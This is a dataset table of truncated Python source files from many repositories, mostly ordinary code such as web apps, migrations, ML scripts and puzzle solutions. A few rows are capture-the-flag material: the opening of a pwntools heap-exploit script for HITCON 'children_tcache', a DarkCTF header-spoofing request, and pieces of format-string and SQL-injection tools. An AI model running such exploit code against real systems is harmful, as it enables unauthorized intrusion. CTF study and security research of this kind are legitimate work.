max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
jobson_systemtests/cli.py | adamkewley/jobson_systemtests | 0 | 12796151 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed t... | 2.328125 | 2 |
conventions/migrations/0008_auto_20210831_1707.py | MTES-MCT/appel | 0 | 12796152 | <filename>conventions/migrations/0008_auto_20210831_1707.py
# Generated by Django 3.2.5 on 2021-08-31 15:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("conventions", "0007_auto_20210831_0908"),
]
operations = [
migrations.AddField(
... | 1.382813 | 1 |
src/findRepeatedDnaSequences.py | JL1829/LeetCode | 0 | 12796153 | <gh_stars>0
"""
所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成， 例如：
`ACGAATTCCG`。在研究DNA时，识别DNA中重复的序列有时候会对研究很有帮助。
编写一个函数， 找出所有的目标子串，目标子串长度为`L`， 且在DNA字符串`s` 中出现次数超过一次
**test case**
>>> s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
>>> findRepeatedDnaSequence(sequence=s, length=10)
['AAAAACCCCC', 'CCCCCAAAAA']
>>> s = 'AAAAAAAAAAAAA... | 3.78125 | 4 |
onyx/main.py | mudkipdev/onyx | 0 | 12796154 | from discord.ext import commands
import discord
import yaml
import os
class Bot(commands.Bot):
async def get_prefix(self, bot, message):
"""Fetches the current prefix in the guild from the database."""
return commands.when_mentioned_or("onyx ")
def __init__(self):
"""Initialize the bot... | 2.515625 | 3 |
src/search/views.py | l27-0-0-1/sigma | 0 | 12796155 | import urllib.parse
from django.shortcuts import render
#from ckan_model import stub as ckan
from ckan_model import production as ckan
#from ..ckan_model import production as ckan
import django.http
def index(request: django.http.HttpRequest):
payload = {}
google = ckan.Search()
payload['top_tags'] = ... | 2.140625 | 2 |
plot_redshift_distr.py | anjmittu/SwiftGRB_PEanalysis-master | 5 | 12796156 | import numpy as np
from scipy.integrate import quad
import matplotlib.pyplot as plt
def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)):
Rlow = np.power((1.0 + z), n1)
Rhigh = np.power((1.0 + z), n2)
rbrk = np.power((1.0 + z1), n1 - n2)
R = Rlow * (z <= z1) + rbrk * Rhigh * (z > z1)
R *= n0 / R[0]
ret... | 2.609375 | 3 |
Leetcode/1000-2000/1872. Stone Game VIII/1872.py | Next-Gen-UI/Code-Dynamics | 0 | 12796157 | <filename>Leetcode/1000-2000/1872. Stone Game VIII/1872.py
class Solution:
def stoneGameVIII(self, stones: List[int]) -> int:
n = len(stones)
prefix = list(accumulate(stones))
# dp[i] := max score diff the current player can get when the game starts
# at i, i.e., stones[0..i] are merged whose value is... | 3.1875 | 3 |
src/jupyter_contrib_nbextensions/hello.py | satishv21/jupyter_contrib_nbextensions | 0 | 12796158 | <filename>src/jupyter_contrib_nbextensions/hello.py
def main(str):
print("nonce")
| 1.117188 | 1 |
game_summary/__init__.py | ch4zm/blaseball-game-summary | 0 | 12796159 | <gh_stars>0
_program = "game-summary"
__version__ = "0.7.1"
| 1.007813 | 1 |
examples/reply_keyboard/button.py | dotX12/waio | 24 | 12796160 | from waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage
from callback import callback_reply_keyboard
def generate_keyboard_place():
kb_content = QuickReplyContentText(
header="Куда вы сегодня хотите сходить?",
text="Выберите из предложенного списка... | 2.453125 | 2 |
KAT7/reduction/horizon_mask_reduction.py | ska-sa/katsdpscripts | 0 | 12796161 | <gh_stars>0
#!/usr/bin/python
# Plot horizon mask
import optparse
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import scape
from katpoint import rad2deg
def remove_rfi(d,width=3,sigma=5,axis=1):
for i in range(len(d.scans)):
d.scans[i].data = scape.stats.remove_spikes... | 2.53125 | 3 |
vim/vimfiles/python3/search_notes.py | sharat87/lawn | 5 | 12796162 | #!/usr/bin/env python
# Python script for fast text file searching using keyword index on disk.
#
# Author: <NAME> <<EMAIL>>
# Last Change: November 1, 2015
# URL: http://peterodding.com/code/vim/notes/
# License: MIT
#
# This Python script can be used by the notes.vim plug-in to perform fast
# keyword searches in the... | 3.15625 | 3 |
formatic/walkers/function_injection_walker.py | welchbj/formatic | 2 | 12796163 | """Implementation of the FunctionInjectionWalker class."""
from inspect import (
signature as inspect_signature)
from types import (
CodeType,
FunctionType)
from typing import (
Iterator,
Optional)
from .abstract_injection_walker import (
AbstractInjectionWalker)
from .code_object_injection_w... | 2.75 | 3 |
tests/test_pathutils.py | pombredanne/https-github.com-nexB-tracecode-toolkit | 21 | 12796164 | #
# Copyright (c) nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/tracecode-toolkit/
# The TraceCode software is licensed under the Apache License version 2.0.
# Data generated with TraceCode require an acknowledgment.
# TraceCode is a trademark of nexB Inc.
#
# You may not use ... | 1.375 | 1 |
django_learning/dim_sum/migrations/0002_dimsum_history.py | angelptli/django-learning | 0 | 12796165 | # Generated by Django 3.2.8 on 2021-10-24 01:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dim_sum', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='dimsum',
name='history',
fi... | 1.671875 | 2 |
tests/unit/api/models/test_subscriptions.py | kikkomep/life_monitor | 5 | 12796166 |
# Copyright (c) 2020-2021 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribu... | 2.046875 | 2 |
src/yolo4/BaseModel.py | xiao9616/yolo4_tensorflow2 | 212 | 12796167 | # =============================================
# -*- coding: utf-8 -*-
# @Time : 2020/5/14 上午10:50
# @Author : xiao9616
# @Email : <EMAIL>
# @File : BaseModel.py
# @Software: PyCharm
# ============================================
import logging
import tensorflow as tf
import os
f... | 2.34375 | 2 |
2019/20/day20.py | mfep/advent-of-code-2020 | 2 | 12796168 | import networkx as nx
import sys
from collections import defaultdict
sys.setrecursionlimit(100000000)
def direct_paths(lines):
world = nx.Graph()
for row,line in enumerate(lines):
for col,obj in enumerate(line):
if obj != '.':
continue
if line[col - 1] == '.':
... | 2.828125 | 3 |
rp2paths/DotStyle.py | brsynth/RP2paths | 13 | 12796169 | <filename>rp2paths/DotStyle.py
"""Class for setting the appearance of a dot file.
Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA
Use of this source code is governed by the MIT license that can be found in the
LICENSE.txt file.
"""
class NodeStyle(object):
"""General class for node style."""
... | 2.921875 | 3 |
mandala/tests/test_deletion.py | amakelov/mandala | 9 | 12796170 | <reponame>amakelov/mandala<filename>mandala/tests/test_deletion.py
from .utils import *
from .funcs import *
from .conftest import setup_tests
def test_simple(setup_tests):
storage, cts = setup_tests
storage:Storage
############################################################################
###... | 2.171875 | 2 |
ist-study-table-roc.py | lhwangbo/m-ist | 0 | 12796171 | import time
import matplotlib.pyplot as plt
from joblib import dump, load
from sklearn.model_selection import *
# A custom-made library for reporting
from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer
# Written by <NAME>, MD. Dec 2021.
##### BEGIN
print('Loading dataframe, base, and ensemble c... | 2.65625 | 3 |
src/utils.py | qbasista/api-scraper | 0 | 12796172 | <filename>src/utils.py
from typing import Dict
def add_prefix_to_keys(data: Dict, prefix: str) -> Dict:
keys = [*data.keys()]
for key in keys:
data[f"{prefix}_{key}"] = data.pop(key)
return data
| 2.765625 | 3 |
unit_tests/LLC1/test_create_llc1.py | LandRegistry/maintain-frontend | 1 | 12796173 | <filename>unit_tests/LLC1/test_create_llc1.py<gh_stars>1-10
from flask_testing import TestCase
from unit_tests.utilities import Utilities
from maintain_frontend import main
from maintain_frontend.dependencies.session_api.session import Session
from maintain_frontend.constants.permissions import Permissions
from flask i... | 2.390625 | 2 |
ex022.py | LucasIdalino/Exerc-cios-do-Curso | 0 | 12796174 | <gh_stars>0
#Valor da variável sem espaços no ínicio e fim.
nome = str(input("Seu nome: ")).strip()
#Valor da variável em letras maiúscula.
print("Maiúscula:", nome.upper(), "\033[1;32m<--\033[m")
#Valor da variável em letras minúsculas.
print("Minúscula:", nome.lower(), "\033[1;32m<--\033[m")
#Contando quantas letr... | 3.9375 | 4 |
client.py | bollacker/lri-b | 0 | 12796175 | <filename>client.py
#!/usr/bin/env python
# Copyright 2012-2013 inBloom, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.... | 2.5 | 2 |
DarkCTF 2020/Web/Source/exploit.py | UnknownAbyss/CTF-Write-ups | 73 | 12796176 | import requests
url = 'http://source.darkarmy.xyz/'
r = requests.get(url, headers={
'user-agent': '9e9',
})
print(r.text)
# darkCTF{changeing_http_user_agent_is_easy} | 2.421875 | 2 |
facetracker/__init__.py | amitibo/pyfacetracker | 2 | 12796177 | """
pyfacetracker: Python wrapper for FaceTracker.
==============================================
FaceTracker is a library for deformable face tracking written in C++ using
OpenCV 2, authored by <NAME> and maintained by <NAME>. It is
available free for non-commercial use, and may be redistributed under these
co... | 1.445313 | 1 |
code/main-multislot-ewc.py | gungui98/sumbt | 99 | 12796178 | import csv
import os
import logging
import argparse
import random
import collections
import operator
from tqdm import tqdm, trange
import numpy as np
import torch
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from p... | 2.28125 | 2 |
s3-encfs-fuse.py | hirokikana/s3-encfs-fuse | 0 | 12796179 | <gh_stars>0
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from s3encfs.s3fs import S3FS
from sys import argv, exit
import logging
from fuse import FUSE
if __name__ == '__main__':
if len(argv) != 2:
print('usage: %s <mountpoint>' % argv[0])
exit(1)
logging.basicConfig(level=logging.DEBUG)
f... | 1.914063 | 2 |
ipcrg/resources/id_mapping/download_human_gene_mapping.py | iPC-project-H2020/ipcrg | 3 | 12796180 | <filename>ipcrg/resources/id_mapping/download_human_gene_mapping.py<gh_stars>1-10
"""Download the latest NCBI id mapping for humans."""
import os
import argparse
import urllib.request
import pandas as pd
MAPPING_FTP_FILEPATH = (
'ftp://ftp.ncbi.nlm.nih.gov/gene/DATA/'
'gene2accession.gz'
)
TAX_ID = 9606
parse... | 2.953125 | 3 |
openslides_backend/action/action_interface.py | reiterl/openslides-backend | 0 | 12796181 | from typing import Any, Dict, List
from mypy_extensions import TypedDict
from typing_extensions import Protocol
ActionPayload = List[Dict[str, Any]]
ActionPayloadWithLabel = TypedDict(
"ActionPayloadWithLabel", {"action": str, "data": ActionPayload}
)
Payload = List[ActionPayloadWithLabel]
ActionResult = TypedDi... | 2.6875 | 3 |
openmct_python_example/python-server/test.py | waltoncade/KSD_GroundSystems | 2 | 12796182 | <reponame>waltoncade/KSD_GroundSystems<gh_stars>1-10
import queue, threading, time
hist = queue.Queue()
real = queue.Queue()
def putData():
histStart = 0
realStart = 0
while True:
time.sleep(1)
hist.put(histStart)
real.put(realStart)
histStart = histStart - 1
realS... | 2.6875 | 3 |
aerolyzer/wunderData.py | Aerolyzer/Aerolyzer | 9 | 12796183 | <gh_stars>1-10
import urllib2
import json
import sys
import os
#def get_wunderkey()
def get_data(coord):
'''
Purpose: The purpose of this script is to retrieve meteorological data
of a given comma-separated latitude and longitute coordinates via the
wunderground API.
Inputs: coord:... | 3.625 | 4 |
reader.py | pianomania/cifar10 | 2 | 12796184 | import numpy as np
import os
import re
import cPickle
class read_cifar10(object):
def __init__(self, data_path=None, is_training=True):
self.data_path = data_path
self.is_training = is_training
def load_data(self):
files = os.listdir(self.data_path)
if self.is_training is True:
pattern = ... | 2.390625 | 2 |
things_cli/__init__.py | thingsapi/things-cli | 49 | 12796185 | <gh_stars>10-100
"""A simple Python 3 CLI to read your Things app data."""
__author__ = "<NAME>"
__copyright__ = "2021 <NAME>"
__credits__ = ["<NAME>"]
__license__ = "Apache License 2.0"
__version__ = "0.1.2"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
| 1.375 | 1 |
packages/core/minos-microservice-networks/minos/networks/brokers/handlers/__init__.py | bhardwajRahul/minos-python | 247 | 12796186 | from .impl import (
BrokerHandler,
)
from .ports import (
BrokerHandlerService,
BrokerPort,
)
| 1.148438 | 1 |
combinatorics.py | GoaPhuDen/algorithms-in-python | 100 | 12796187 | """ Various combinatorics functions. """
__author__ = "<NAME>"
__date__ = "2015-02-20"
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n-1)
def permutations(lst):
result = []
def permute(current, rest):
if rest == []:
result.append(current)
... | 4.03125 | 4 |
sqliscan/lib/reporter.py | Marzooq13579/Hack-Gadgets | 8 | 12796188 | <reponame>Marzooq13579/Hack-Gadgets
from lib.colour import colours
class Report:
def __init__(self, msg, result=False):
"""
Handles the message and report it back to console
:param msg : String type message
:param result : the boolean object indicating if the url is vulnerable
... | 3.03125 | 3 |
assessment/migrations/0008_auto_20190125_1249.py | kenware/Assessment | 0 | 12796189 | # Generated by Django 2.1.4 on 2019-01-25 12:49
import datetime
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assessment', '0007_answer_is_correct_choice'),
]
operations = [
migrations.Remov... | 1.828125 | 2 |
scripts/plot_compartment_strength.py | Lila14/multimds | 0 | 12796190 | <filename>scripts/plot_compartment_strength.py
from matplotlib import pyplot as plt
import sys
sys.path.append("..")
import compartment_analysis as ca
import data_tools as dt
import os
paths = sys.argv[1:len(sys.argv)]
prefixes = [os.path.basename(path) for path in paths]
structs = [dt.structureFromBed(path) for path ... | 2.390625 | 2 |
tests/__init__.py | crashfrog/peewee-pymssql | 0 | 12796191 | """Unit test package for peewee_pymssql."""
| 1.132813 | 1 |
server/social_network/views.py | ctcusc/django-react-boilerplate | 5 | 12796192 | """API views for social_network."""
from rest_framework import viewsets
from rest_framework.decorators import api_view, detail_route
from rest_framework.response import Response
from rest_framework.reverse import reverse
from .models import Profile, Post, Vote
from .serializers import ProfileSerializer, PostSerialize... | 2.734375 | 3 |
HITCON/2018/children_tcache/exploit.py | Per5ianCat/ctf-writeups | 476 | 12796193 | #!/usr/bin/env python
from pwn import *
def new_heap(size, data, attack=False):
p.sendlineafter('Your choice: ', '1')
p.sendlineafter('Size:', str(size))
if attack:
return
p.sendafter('Data:', data)
if len(data) < size:
p.sendline()
def show_heap(index):
p.sendlineafter('Your ... | 2.546875 | 3 |
CKButils.py | MathAI-LAB/CKB | 5 | 12796194 | <filename>CKButils.py
# -*- coding: utf-8 -*-
import torch
from torch.autograd import Variable
import sys
##################################
# Network & Variable
##################################
def weights_init(m):
"""Initialize network parameters."""
classname = m.__class__.__name__
if classname.find('... | 2.796875 | 3 |
Time_Series_DataAnalysis_Tool/__init__.py | chetanrrk/Time_Series_Data_Analysis_Tools | 1 | 12796195 | import Time_Series_DataAnalysis_Tool.time_series_analysis
import Time_Series_DataAnalysis_Tool.examples
import Time_Series_DataAnalysis_Tool.test
| 1 | 1 |
spladder/classes/counts.py | ratschlab/spladder | 96 | 12796196 | <filename>spladder/classes/counts.py
import numpy as np
class Counts:
def __init__(self, seg_num):
self.segments = np.zeros((seg_num,), dtype='float')
self.seg_pos = np.zeros((seg_num,), dtype='float')
self.edges = np.zeros((0, 2), dtype='float')
| 2.796875 | 3 |
ven2/lib/python2.7/site-packages/zope/security/metadirectives.py | manliu1225/Facebook_crawler | 3 | 12796197 | <reponame>manliu1225/Facebook_crawler
##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL sh... | 1.703125 | 2 |
src/compas_singular/rhino/rhino/__init__.py | christiandimitri/compas_singular | 1 | 12796198 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .density import *
from .display import *
from .getters import *
from .pattern import *
from .patternartist import *
__all__ = [name for name in dir() if not name.startswith('_')]
| 1.507813 | 2 |
uc2data/helpers.py | TUBklima/UC2Data | 6 | 12796199 | from .Dataset import Dataset
from pathlib import Path
def check_multi(folder):
pathlist = Path(folder).glob('**/*.nc')
for path in pathlist:
outfile = Path(str(path).replace(".nc", ".check"))
try:
with Dataset(path) as i_data:
i_data.uc2_check()
i_... | 2.578125 | 3 |
dolo/compiler/model_numeric.py | zlqs1985/dolo | 0 | 12796200 | import ast
from collections import OrderedDict
from .codegen import to_source
from .function_compiler_ast import timeshift, StandardizeDatesSimple
from dolo.compiler.recipes import recipes
from numba import njit
class NumericModel:
calibration = None
calibration_dict = None
covariances = None
markov_c... | 2.125 | 2 |
tests/bmc_test.py | reich6534/SumoPY | 0 | 12796201 | <reponame>reich6534/SumoPY<filename>tests/bmc_test.py
from nose.tools import *
from bmc.book import Book
def setup():
print ("SETUP!")
def teardown():
print("TEAR DOWN!")
def test_bookname():
matthew = Book("Matthew", 27)
assert_equal(matthew.name, "Matthew")
@raises (IndexError)
def test_small():
... | 2.328125 | 2 |
tests/vfs/gzip_file_system.py | Defense-Cyber-Crime-Center/dfvfs | 2 | 12796202 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the file system implementation using gzip."""
import os
import unittest
from dfvfs.path import gzip_path_spec
from dfvfs.path import os_path_spec
from dfvfs.resolver import context
from dfvfs.vfs import gzip_file_system
class GzipFileSystemTest(unittest.TestCas... | 2.609375 | 3 |
Informatik1/Midterms Prep/midterms hs19/count_keywords.py | Queentaker/uzh | 8 | 12796203 | <reponame>Queentaker/uzh<filename>Informatik1/Midterms Prep/midterms hs19/count_keywords.py
def count_keywords(path, keywords):
words = []
sol = dict()
with open(path) as file:
for line in file:
for word in line.split():
words.append(word.lower())
for elemen... | 3.46875 | 3 |
delphi/translators/for2py/strings.py | mikiec84/delphi | 25 | 12796204 | <filename>delphi/translators/for2py/strings.py
"""
File: strings.py
Purpose: Code implementing string objects (corresponding to the Fortran
CHARACTER type) in the code generated by for2py.
Usage: see the document "for2py: Miscellaneous constructs"
"""
class String:
def __init__(self, length =... | 3.140625 | 3 |
functional-problems/deleteNodeFromBst.py | vikas-t/DS-Algo | 0 | 12796205 | <filename>functional-problems/deleteNodeFromBst.py
#!/usr/bin/python3
# https://practice.geeksforgeeks.org/problems/delete-a-node-from-bst/1
def minValueNode(root):
"""
Returns the iorder successor or the next higher node as per
the inorder traversal
"""
current = root
# loop down to find... | 3.984375 | 4 |
codeforces/acmsguru/112.py | Ashindustry007/competitive-programming | 506 | 12796206 | #!/usr/bin/env python3
# https://codeforces.com/problemsets/acmsguru/problem/99999/112
a,b=map(int,input().split())
print(pow(a,b)-pow(b,a))
| 3.265625 | 3 |
catkin_ws/src/tugasakhir/ta_vision/scripts/uji_transdata.py | musyafaarif/workspace | 0 | 12796207 | #!/usr/bin/env python3
import ta_vision
from vision.camera import Camera
from color_detection import ColorDetection
import cv2 as cv
import rospy
import time
import math
from geometry_msgs.msg import PointStamped
from gazebo_msgs.msg import ModelStates
from gazebo_msgs.srv import SetModelState
from gazebo_msgs.msg i... | 2.171875 | 2 |
Standard Library/typing/typing/special_form.py | subhadeep-123/Python-Documents | 2 | 12796208 | <filename>Standard Library/typing/typing/special_form.py
from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union
# This a tuple defined with variable lenght
def print_tuple(data: Tuple[Any, ...]) -> None:
print(data)
def test_union(a: Union[int, float], b: Union[... | 3.109375 | 3 |
src/init.py | arnulfojr/simple-pos | 1 | 12796209 | <filename>src/init.py
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.serving import run_simple
from flask import Flask
from api import app as api_app
from frontend import app as frontend_app
from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER
application = DispatcherMiddleware(frontend_ap... | 1.710938 | 2 |
examples/smart_contracts/v2/python/contract_account.py | TheChronicMonster/docs | 92 | 12796210 | <reponame>TheChronicMonster/docs
from algosdk.v2client import algod
from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction
import base64
def wait_for_confirmation(client, txid):
"""
Utility function to wait until the transaction is
confirmed before proceeding.
"""
last_rou... | 2.828125 | 3 |
Item2Vec/production/produce_item_sim.py | whz-NJ/PersonalRecommendation | 7 | 12796211 | <reponame>whz-NJ/PersonalRecommendation
#-*-coding:utf8-*-
"""
author:zhiyuan
date:2019
produce item sim file
"""
import os
import numpy as np
import operator
import sys
def load_item_vec(input_file):
"""
Args:
input_file: item vec file
Return:
dict key:itemid value:np.array([num1, num2..... | 2.703125 | 3 |
snipz/main.py | deta/programs | 5 | 12796212 | <filename>snipz/main.py
import secrets, string
from deta.lib import App, Database
from fastapi.responses import HTMLResponse
from deta.lib.responses import JSON
from fastapi import FastAPI, Response
from fastapi.middleware.cors import CORSMiddleware
from passlib.context import CryptContext
from pydantic import BaseMode... | 2.234375 | 2 |
v5-unity/codechella-to-codcast/convert.py | ipflsfiles/PyTutor | 17 | 12796213 | <reponame>ipflsfiles/PyTutor
# this script converts a codechella session log recorded by
# ../../v3/opt_togetherjs/server.js
#
# and turns it into the codcast format, which is readable by
# ../js/recorder.ts and ../js/demovideo.ts
#
# writes JSON output to stdout
# created: 2018-05-27
'''
NB: now that i think about ... | 1.84375 | 2 |
11_20/day-19/etch-a-sketch.py | srakhe/100-days-py | 0 | 12796214 | from turtle import Turtle, Screen
my_turtle = Turtle()
screen = Screen()
my_turtle.shape('arrow')
def forward():
my_turtle.forward(10)
def backward():
my_turtle.back(10)
def right():
my_turtle.right(10)
def left():
my_turtle.left(10)
def clear_screen():
my_turtle.penup()
my_turtle.home... | 3.546875 | 4 |
constants/flags.py | CataLatas/earthbound-script-dumper | 2 | 12796215 | # Flag names for MOTHER2/Earthbound
# Luckily, every version uses the same flag IDs
FLAG_NAMES = {
1: 'TEMP_1',
2: 'TEMP_2',
3: 'TEMP_3',
4: 'TEMP_4',
5: 'TEMP_5',
6: 'TEMP_6',
7: 'TEMP_7',
8: 'TEMP_8',
9: 'TEMP_9',
10: 'TEMP_10',
11: 'ENEMY_SUPPRESS',
... | 1.3125 | 1 |
xjsonrpc/client/integrations/pytest.py | bernhardkaindl/pjrpc | 0 | 12796216 | """
`pytest <https://docs.pytest.org/en/latest/>`_ client library integration.
Implements some utilities for mocking out ``xjsonrpc`` library clients.
"""
import asyncio
import collections
import functools as ft
import json
import unittest.mock
from typing import Any, Callable, Dict, Optional, Union
import pytest
im... | 2.4375 | 2 |
scripts/temp/palindrome.py | AgnirudraSil/tetris | 3 | 12796217 | <reponame>AgnirudraSil/tetris<filename>scripts/temp/palindrome.py
inp = input("Enter a number or word: ")
if inp[::-1].lower() == inp.lower():
print("Palindrome")
else:
print("Not Palindrome")
| 3.734375 | 4 |
schedy/pbt.py | incalia/schedy-client | 4 | 12796218 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
#: Minimize the objective
MINIMIZE = 'min'
#: Maximize the objective
MAXIMIZE = 'max'
class Truncate(object):
_EXPLOIT_STRATEGY_NAME = 'truncate'
def __init__(self, proportion=0.2):
'''
... | 3.375 | 3 |
dl/pytorch/rnn/tv_script.py | xta0/Python-Playground | 0 | 12796219 | # load in data
import helper
import numpy as np
import torch
import torch.nn as nn
from string import punctuation
from collections import Counter
from torch.utils.data import TensorDataset, DataLoader
data_dir = './data/Seinfeld_Scripts.txt'
text = helper.load_data(data_dir)
# Check for a GPU
train_on_gpu = torch.cu... | 2.921875 | 3 |
python3/incident/set-owner-and-members-by-phase.py | ibmresilient/resilient-scripts | 26 | 12796220 | <filename>python3/incident/set-owner-and-members-by-phase.py
# (c) Copyright IBM Corp. 2010, 2020. All Rights Reserved.
# Script to set incident owner and members based on Incident Phase.
# To be run when the phase changes.
# Phase is a select field with API name `phase_id`,
# so the tests below are written as
# ... | 2.78125 | 3 |
data/external/repositories_2to3/238397/ucla-cs145-kaggle-master/linearsvclassifier.py | Keesiu/meta-kaggle | 0 | 12796221 | <gh_stars>0
"""
linearsvclassifier.py
Builds a linear support vector classifier
~78 pct accuracy, 0m10.881s execution time
"""
from classifier import Classifier
from matrixdatabase import MatrixDatabase
from sklearn.svm import LinearSVC as SVC
class LinearSVClassifier(Classifier):
def __init__(self,... | 2.390625 | 2 |
alana_pepper/src/alana_node_classes/behaviour_manager.py | cdondrup/inaugural_pepper | 0 | 12796222 | import rospy
import service_utils as su
from nao_interaction_msgs.srv import BehaviorManagerControl, BehaviorManagerControlRequest
from nao_interaction_msgs.srv import BehaviorManagerInfo, BehaviorManagerInfoRequest
def start_behaviour(name):
su.call_service(
"/naoqi_driver/behaviour_manager/start_behavio... | 2.171875 | 2 |
next_word_prediction_using_universal_sentence_encoder.py | Adminixtrator/Next-Word-Prediction-using-Universal-Sentence-Encoder. | 4 | 12796223 | # -*- coding: utf-8 -*-
"""Next-Word Prediction using Universal Sentence Encoder.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1r2ma5P7w2LE30L1o5mAyNPLE7Qi3JxoL
# **Google drive for local storage**
_NB: All comments are written to facilitate s... | 2.3125 | 2 |
paddle2onnx/graph/dygraph_helper.py | neonhuang/Paddle2ONNX | 95 | 12796224 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by appl... | 1.945313 | 2 |
recipes/LibriSpeech/ASR/transformer/train_cl.py | Darshan7575/speechbrain | 0 | 12796225 | <reponame>Darshan7575/speechbrain
#!/usr/bin/env python3
"""Recipe for training a Transformer ASR system with librispeech.
The system employs an encoder, a decoder, and an attention mechanism
between them. Decoding is performed with (CTC/Att joint) beamsearch coupled with a neural
language model.
To run this recipe, d... | 2.28125 | 2 |
app/services/hubspot.py | PrudhviRaj5/boilerplate-sanic | 0 | 12796226 | import requests
import ujson
# from b2b_app.config import CONFIG
class Hubspot:
def __init__(self, hub_id, refresh_token):
self.hub_id = hub_id
self.refresh_token = refresh_token
self.access_token = self.get_access_token(refresh_token)
self._lists_url = 'https://api.hubapi.com/conta... | 2.40625 | 2 |
mmgen/models/architectures/ddpm/modules.py | plutoyuxie/mmgeneration | 718 | 12796227 | <reponame>plutoyuxie/mmgeneration<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
from copy import deepcopy
from functools import partial
import mmcv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ACTIVATION_LAYERS
from mmcv.cnn.bricks impor... | 2.265625 | 2 |
0_PythonFundamental/1_15_conditioning2.py | hnwarid/DQLabAcademy | 0 | 12796228 | jam = 13
if 5 <= jam < 12: # selama jam di antara 5 s.d. 12
print("Selamat pagi!")
elif jam >= 12 and jam < 17: # selama jam di antara 12 s.d. 17 # simplified: elif 12 <= jam < 17
print("Selamat siang!")
elif jam >= 17 and jam < 19: # selama jam di antara 17 s.d. 19
print("Selamat sore!")
else: # sel... | 3.765625 | 4 |
flir_frame_grabber.py | ralphkok/flir-frame-grabber | 1 | 12796229 | <filename>flir_frame_grabber.py
import PySpin
import threading
import time
import cv2
class FLIRFrameGrabber:
_is_camera_inited = False
_latest_camera_frame = None
_last_frame_grab_time = 0
_frame_grab_fps = 0
def is_running(self):
return self._is_running
def get_camera(self):
... | 2.5 | 2 |
file_builder/test/lambda_test.py | btrekkie/file-builder | 1 | 12796230 | import os
from .. import FileBuilder
from .file_builder_test import FileBuilderTest
class LambdaTest(FileBuilderTest):
"""Tests that ``FileBuilder`` methods accept lambda arguments.
Tests that ``FileBuilder`` methods accept lambdas for arguments that
must be callables.
"""
def _build_file(self,... | 2.78125 | 3 |
parser/team09/instrucciones.py | MinervaVilchez/tytus | 0 | 12796231 | <filename>parser/team09/instrucciones.py
import tabla_simbolos as TS
import Errores as E
base_actual = None
class Instruccion():
def __init__(self, tipo, instruccion):
self.tipo = tipo
self.instruccion = instruccion
class Select():
def __init__(self, dist, selcol, fromcol, joins, order, cond... | 2.6875 | 3 |
scrape_mars.py | asianhenry/web-scraping-challenge | 0 | 12796232 | #!/usr/bin/env python
# coding: utf-8
def scrape():
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import time
#dictionary with all data
mars_data={}
executable_path = {'executable_path': 'chromedriver.exe'}
browser = Browser('chrome', **executable... | 3.234375 | 3 |
python/exercicios_avaliativos/cap_3/fibonacci.py | alavarsedouglas/fiap_repository | 0 | 12796233 | <filename>python/exercicios_avaliativos/cap_3/fibonacci.py
f = []
f.append(1)
f.append(1)
n = 0
test = int(input('Digite a posição desejada para saber o número de Fibonacci: '))
while n <= test:
f.append(f[n] + f[n+1])
n += 1
print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1, f[n-2]))
| 4.125 | 4 |
packages/python.py | zpcc/mpkg-pkgs | 1 | 12796234 | from mpkg.common import Soft
from mpkg.utils import Search
class Package(Soft):
ID = 'python'
def _prepare(self):
data = self.data
links = {'32bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}.exe',
'64bit': 'https://www.python.org/ftp/python/{ver}/python-{ver}-amd6... | 2.328125 | 2 |
